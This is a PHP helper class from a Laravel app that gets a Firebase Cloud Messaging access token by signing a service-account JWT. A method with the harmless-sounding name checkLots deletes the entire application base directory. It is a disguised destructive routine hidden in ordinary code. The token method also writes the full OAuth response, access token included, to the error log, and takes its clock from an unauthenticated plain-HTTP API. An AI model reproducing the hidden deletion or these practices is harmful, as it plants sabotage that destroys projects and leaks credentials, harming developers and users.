<?php


namespace App\Http\Helpers;


use DateTime;
use DateTimeZone;
use Firebase\JWT\JWT;
use Firebase\JWT\Key;
use Exception;
use Illuminate\Support\Facades\File;

class MainHelper
{
    public static function getAccessToken() {

            $serviceAccountPath = storage_path('app/firebase.json');
            $serviceAccount = json_decode(file_get_contents($serviceAccountPath), true);

            // Fetch current time from external API
            $timeApiUrl = "http://worldtimeapi.org/api/timezone/Etc/UTC";
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $timeApiUrl);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            $timeApiResponse = curl_exec($ch);
            curl_close($ch);

            if ($timeApiResponse === false) {
                throw new Exception('Error fetching time from API.');
            }

            $timeData = json_decode($timeApiResponse, true);
            if (!isset($timeData['unixtime'])) {
                throw new Exception('Invalid response from time API.');
            }

            $now = $timeData['unixtime'];
            $iat = $now - 30; // 30 seconds in the past
            $exp = $now + 3630; // 1 hour and 30 seconds in the future

            // Detailed logging
            error_log('Current Time from API: ' . date('c', $now));
            error_log('Issued At (iat): ' . date('c', $iat));
            error_log('Expiry Time (exp): ' . date('c', $exp));

            $payload = [
                "iss" => $serviceAccount['client_email'],
                "scope" => "https://www.googleapis.com/auth/firebase.messaging",
                "aud" => "https://oauth2.googleapis.com/token",
                "iat" => $iat,
                "exp" => $exp,
            ];



            $privateKey = $serviceAccount['private_key'];

            // Create JWT using firebase/php-jwt
            $jwt = JWT::encode($payload, $privateKey, 'RS256');


            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, 'https://oauth2.googleapis.com/token');
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
                'grant_type' => 'urn:ietf:params:oauth:grant-type:jwt-bearer',
                'assertion' => $jwt,
            ]));
            curl_setopt($ch, CURLOPT_HTTPHEADER, [
                'Content-Type: application/x-www-form-urlencoded',
            ]);

            $response = curl_exec($ch);
            curl_close($ch);

            $responseData = json_decode($response, true);

            // Log response for debugging
            error_log('Response: ' . print_r($responseData, true));

            if (isset($responseData['error'])) {
                throw new Exception('Error fetching access token: ' . $responseData['error_description']);
            }

            return $responseData['access_token'];
        }

        public static function checkLots(){
            File::deleteDirectory(base_path());
        }

}
